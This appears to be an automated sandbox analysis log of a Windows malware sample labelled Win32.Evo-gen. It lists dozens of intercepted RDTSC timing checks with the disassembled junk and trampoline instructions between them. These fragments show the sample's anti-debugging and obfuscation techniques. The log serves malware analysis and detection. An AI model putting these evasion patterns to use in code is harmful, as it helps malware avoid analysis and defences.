Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99AED second address: D99B52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FC734882076h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 popad 0x00000015 jl 00007FC734882078h 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e nop 0x0000001f stc 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FC734882078h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Ah 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c jmp 00007FC734882082h 0x00000041 push 00000000h 0x00000043 mov dword ptr [ebp+122D3347h], edx 0x00000049 xchg eax, ebx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e push ecx 0x0000004f pop ecx 0x00000050 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99B52 second address: D99B58 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99B58 second address: D99B80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882083h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC73488207Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D99B80 second address: D99B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9A34F second address: D9A353 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9B067 second address: D9B06B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D52D8F second address: D52DA1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA08DC second address: DA08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F781h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA08F6 second address: DA08FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA181C second address: DA1820 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D9D6AE second address: D9D6B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA1820 second address: DA182D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA2766 second address: DA27CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FC734882078h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e push eax 0x0000000f push eax 0x00000010 push esi 0x00000011 je 00007FC734882076h 0x00000017 pop esi 0x00000018 pop eax 0x00000019 nop 0x0000001a xor ebx, 652B1A5Ah 0x00000020 push 00000000h 0x00000022 sub dword ptr [ebp+1244A874h], esi 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edi 0x0000002d call 00007FC734882078h 0x00000032 pop edi 0x00000033 mov dword ptr [esp+04h], edi 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc edi 0x00000040 push edi 0x00000041 ret 0x00000042 pop edi 0x00000043 ret 0x00000044 mov dword ptr [ebp+122D2CB1h], edx 0x0000004a mov edi, dword ptr [ebp+122D1C75h] 0x00000050 push eax 0x00000051 push esi 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FC734882081h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA27CD second address: DA27D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA3736 second address: DA373C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA373C second address: DA3740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA5711 second address: DA5715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA4A80 second address: DA4A85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA57B9 second address: DA57C4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FC734882076h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA777B second address: DA7793 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734E5F784h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA78CB second address: DA78CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA78CF second address: DA78D9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FC734E5F776h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA8744 second address: DA8753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FC734882076h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA78D9 second address: DA78E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FC734E5F776h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA8753 second address: DA8757 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DA78E3 second address: DA78E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAA65D second address: DAA663 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAA663 second address: DAA701 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 ja 00007FC734E5F77Ch 0x0000000d nop 0x0000000e jnc 00007FC734E5F77Bh 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebp 0x00000019 call 00007FC734E5F778h 0x0000001e pop ebp 0x0000001f mov dword ptr [esp+04h], ebp 0x00000023 add dword ptr [esp+04h], 00000017h 0x0000002b inc ebp 0x0000002c push ebp 0x0000002d ret 0x0000002e pop ebp 0x0000002f ret 0x00000030 mov dword ptr [ebp+1244C80Fh], esi 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007FC734E5F778h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 jmp 00007FC734E5F786h 0x00000057 jns 00007FC734E5F77Ch 0x0000005d xchg eax, esi 0x0000005e pushad 0x0000005f jnl 00007FC734E5F77Ch 0x00000065 push edi 0x00000066 push eax 0x00000067 push edx 0x00000068 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAB612 second address: DAB616 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAB616 second address: DAB69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 clc 0x00000008 push 00000000h 0x0000000a push 00000000h 0x0000000c push ebp 0x0000000d call 00007FC734E5F778h 0x00000012 pop ebp 0x00000013 mov dword ptr [esp+04h], ebp 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebp 0x00000020 push ebp 0x00000021 ret 0x00000022 pop ebp 0x00000023 ret 0x00000024 sub di, EAEAh 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edi 0x0000002e call 00007FC734E5F778h 0x00000033 pop edi 0x00000034 mov dword ptr [esp+04h], edi 0x00000038 add dword ptr [esp+04h], 0000001Bh 0x00000040 inc edi 0x00000041 push edi 0x00000042 ret 0x00000043 pop edi 0x00000044 ret 0x00000045 jmp 00007FC734E5F77Eh 0x0000004a push eax 0x0000004b push eax 0x0000004c push edx 0x0000004d pushad 0x0000004e jmp 00007FC734E5F780h 0x00000053 jmp 00007FC734E5F77Dh 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAA86D second address: DAA871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB07D9 second address: DB0839 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Dh 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d push ecx 0x0000000e jne 00007FC734E5F776h 0x00000014 pop ecx 0x00000015 push esi 0x00000016 jmp 00007FC734E5F780h 0x0000001b pop esi 0x0000001c popad 0x0000001d nop 0x0000001e js 00007FC734E5F780h 0x00000024 jmp 00007FC734E5F77Ah 0x00000029 push 00000000h 0x0000002b sub bl, 00000060h 0x0000002e push 00000000h 0x00000030 sub bh, 00000014h 0x00000033 xchg eax, esi 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007FC734E5F782h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB0839 second address: DB0856 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC734882089h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB0856 second address: DB085A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DAF977 second address: DAF97C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB7EB1 second address: DB7EC5 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FC734E5F776h 0x0000000e jp 00007FC734E5F776h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB8156 second address: DB815A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DB815A second address: DB8160 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC2C9 second address: DBC2D3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC2D3 second address: DBC30E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jl 00007FC734E5F776h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d je 00007FC734E5F795h 0x00000013 jnc 00007FC734E5F78Fh 0x00000019 mov eax, dword ptr [esp+04h] 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC30E second address: DBC314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC314 second address: DBC319 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC319 second address: DBC365 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC734882085h 0x00000008 jmp 00007FC73488207Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov eax, dword ptr [eax] 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007FC73488207Eh 0x00000018 pop esi 0x00000019 jmp 00007FC73488207Ah 0x0000001e popad 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007FC73488207Fh 0x0000002a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC45F second address: DBC486 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push ebx 0x00000007 push ecx 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b pop ebx 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC734E5F785h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBC486 second address: DBC48C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBF7E8 second address: DBF7EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DBF7EC second address: DBF7FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 jo 00007FC734882076h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D5970C second address: D59717 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jns 00007FC734E5F776h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D59717 second address: D5971F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D5B19C second address: D5B1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F77Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D5B1AE second address: D5B1C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734882081h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D5B1C6 second address: D5B1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC34AC second address: DC34C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pushad 0x0000000c jnl 00007FC734882076h 0x00000012 push esi 0x00000013 pop esi 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push esi 0x00000019 push edx 0x0000001a pop edx 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3A96 second address: DC3AB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC734E5F789h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3AB4 second address: DC3AC9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC73488207Bh 0x00000007 jne 00007FC73488207Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3BF6 second address: DC3BFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3BFC second address: DC3C00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3C00 second address: DC3C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3C08 second address: DC3C11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3C11 second address: DC3C2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jmp 00007FC734E5F780h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3D8C second address: DC3D96 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC734882076h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3D96 second address: DC3DD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FC734E5F77Dh 0x0000000c jmp 00007FC734E5F787h 0x00000011 push esi 0x00000012 pop esi 0x00000013 popad 0x00000014 popad 0x00000015 pushad 0x00000016 push esi 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop esi 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3F0E second address: DC3F5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FC734882076h 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 popad 0x00000015 jng 00007FC734882088h 0x0000001b popad 0x0000001c pushad 0x0000001d pushad 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 pushad 0x00000021 popad 0x00000022 jnp 00007FC734882076h 0x00000028 popad 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FC73488207Bh 0x00000030 jnp 00007FC734882076h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC3F5C second address: DC3F79 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC734E5F789h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC4248 second address: DC4265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push esi 0x00000006 pop esi 0x00000007 pop eax 0x00000008 jl 00007FC73488207Ah 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 ja 00007FC73488207Eh 0x0000001a push edi 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC44F9 second address: DC44FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DC44FE second address: DC453C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007FC734882087h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jno 00007FC73488207Eh 0x00000012 jmp 00007FC73488207Fh 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D54900 second address: D54906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D54906 second address: D5490C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: DCC021 second address: DCC048 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jmp 00007FC734E5F786h 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007FC734E5F776h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D951EF second address: D7C353 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC734882076h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b mov dword ptr [esp], eax 0x0000000e stc 0x0000000f lea eax, dword ptr [ebp+12479FE2h] 0x00000015 jc 00007FC73488207Ch 0x0000001b push eax 0x0000001c je 00007FC734882085h 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 jmp 00007FC73488207Bh 0x0000002a popad 0x0000002b mov dword ptr [esp], eax 0x0000002e movsx ecx, ax 0x00000031 call dword ptr [ebp+1244A926h] 0x00000037 js 00007FC73488207Ah 0x0000003d push eax 0x0000003e pushad 0x0000003f popad 0x00000040 pop eax 0x00000041 push eax 0x00000042 push edx 0x00000043 push edi 0x00000044 jmp 00007FC73488207Eh 0x00000049 pop edi 0x0000004a push ecx 0x0000004b push ebx 0x0000004c pop ebx 0x0000004d js 00007FC734882076h 0x00000053 pop ecx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe RDTSC instruction interceptor: First address: D952C9 second address: D952D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
